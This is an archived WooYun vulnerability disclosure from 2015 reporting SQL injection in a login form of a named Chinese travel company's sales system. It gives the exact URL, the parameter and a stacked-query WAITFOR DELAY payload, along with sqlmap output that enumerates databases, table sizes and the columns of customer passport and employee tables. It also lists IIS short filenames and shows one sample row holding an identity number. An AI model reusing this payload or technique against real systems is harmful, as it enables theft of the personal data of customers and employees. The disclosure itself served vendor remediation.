当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117788

漏洞标题:腾邦国际某重要系统SQL注射泄露员工信息&用户护照等信息

相关厂商:腾邦集团

漏洞作者: 路人甲

提交时间:2015-06-03 09:10

修复时间:2015-07-20 14:22

公开时间:2015-07-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

233

详细说明:

http://sales.tempus.cn系统登录处
http://sales.tempus.cn:80/default.asp?action=login (POST)
submit=&textfield=AzRhEli1&textfield2=1

漏洞证明:

---
Parameter: textfield (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: submit=&textfield=AzRhEli1');WAITFOR DELAY '0:0:5'--&textfield2=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'zytoa'
available databases [14]:
[*] [CobraDGSesver\x04]
[*] [dayniton\x02]
[*] [master\x03]
[*] [oanew\x05a1\x11\x02]
[*] AdvanEmpDb
[*] model
[*] msdb
[*] Standard_Global
[*] StandardCommonModule
[*] tempdb
[*] tgctour2010
[*] trafax60
[*] veetermsharelog
[*] zytoa
Database: zytoa
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| zytoa.kehu       | 533296  |      53万客户,涉及护照信息
| zytoa.gongdan    | 407068  |      40万工单
| zytoa.guoji      | 374765  |
| zytoa.LogIP      | 204865  |
| zytoa.tuipiao    | 21037   |
| zytoa.piao       | 10337   |
| zytoa.guonei     | 8927    |
| zytoa.otherpiao  | 7284    |
| zytoa.yjflog     | 6257    |
| zytoa.gd         | 1294    |
| zytoa.yjf        | 669     |
| zytoa.News       | 458     |
| zytoa.yuangong   | 370     |     员工信息
| zytoa.gys        | 198     |
| zytoa.airwayslxr | 173     |
| zytoa.airways    | 139     |
| zytoa.piaogroup  | 51      |
| zytoa.bumen      | 24      |
| zytoa.quanxian   | 18      |
| zytoa.bigbumen   | 12      |
| zytoa.SmallClass | 3       |
+------------------+---------+
下面贴出列信息,不贴数据证明:
Table: zytoa.kehu
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| pnrid | kehuid | guoji | baoxian | xingbie | xingming | huiyuanhao | piaohao	   | chengyun	   | huzhaohaoma        | chushengnianyue | huzhaoyouxiaoqi | xingchengdan	   | zhengjiqnleixing |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| 119   | 100    | CN    |         |         | 遟乓獞      |            |            |             | 420112197609081519 | \x05            |                 |                 |                  |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
Table: zytoa.gongdan
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
| pnrid | lianxidianhua | sub | flag | dahui | beizhu | lirunA | gystime | ifzhifu | pnrdata | pnrcode | kehutime | tiaojian | lianxiren | ITINERARY | zhifuyuan | zuoxiyuan | yuejiefang | zuoxibumen | dijia_heji | huilv\x11   | chupiaoyuan | shoujihaoma | diaoduyuanA | tuishenyuan | chushenyuan | songpiaoyuan | shoujia_heji | piaotype\t   | chupiaobumen | zhifushijian | xieyijingban | gongyingshang | songpiaodizhi | diaodushijian | kepiaoxingshi | baoxian_dijia | zhongshenyuan | yingyebumaoli | BookingPerson | InvoiceNumber | fukuangfangshi | chupiaoshijian | tuishenshijian | jieshoushijian | chushenshijian | baoxian_source | tianjiashijian | songpiaoshixian | baoxian_shoujia | OwnerDepartment | baoxian_zhangshu | iSShanghaiyingyebu | zhongshenshijian\x05   |
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
Table: zytoa.yuangong
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
| id | idcode | bumenid\x02   | qq | msn | theme | zuoji | email | zaizhi | shouji | username | xingming | quanxian | password | bumenquanxian |
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
拿到员工信息,是不是可以进内网了?
---------------------------------------------------------------------
送个iis枚举
Dir:  /airway~1
Dir:  /aspnet~1
File: /callce~1.asp
File: /chupia~1.asp
File: /chushe~1.asp
File: /ch4f02~1.asp
File: /ch4f06~1.asp
File: /ch588c~1.asp
File: /ch9f02~1.asp
File: /ch9880~1.asp
File: /coa77a~1.asp
File: /count_~1.asp
File: /co5a42~1.asp
File: /fare_i~1.asp
File: /newsea~1.asp
File: /piaogr~1.asp
File: /tmp_ri~1.asp
File: /tm143c~1.asp
File: /tm1438~1.asp
File: /viewpr~1.asp
File: /xieyie~1.asp
File: /xieyik~1.asp
File: /xieyiv~1.asp
File: /xlf96c~1.asp
File: /xlf964~1.asp
File: /xlf968~1.asp
File: /xls_fe~1.asp
File: /xls_co~1.asp
File: /xls_ge~1.asp
File: /xls_ri~1.asp
File: /xls_ti~1.asp
File: /xls_wi~1.asp
File: /xl4cbb~1.asp
File: /xl4c7b~1.asp
File: /xl408b~1.asp
File: /xl487b~1.asp
File: /xl967e~1.asp
File: /zha31a~1.asp
File: /zhe316~1.asp
File: /zhongs~1.asp
File: /rif6ea~1.asp
File: /right_~1.asp


20150602174943.png

修复方案:

~~~~~~~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-05 14:21

厂商回复:

感谢厂商以及白帽子的协助发现,我们已经安排人员处理中。

最新状态:

暂无